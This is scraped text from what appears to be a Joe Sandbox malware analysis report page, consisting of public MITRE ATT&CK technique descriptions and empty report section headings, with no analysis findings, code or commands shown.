Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report 0331C7BCA665F36513377FC301CBB32822FF35F925115.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Overview

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Jbx Signature Overview

AV Detection:

Cryptography:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Snort IDS Alerts

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	API monitoring, File monitoring, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre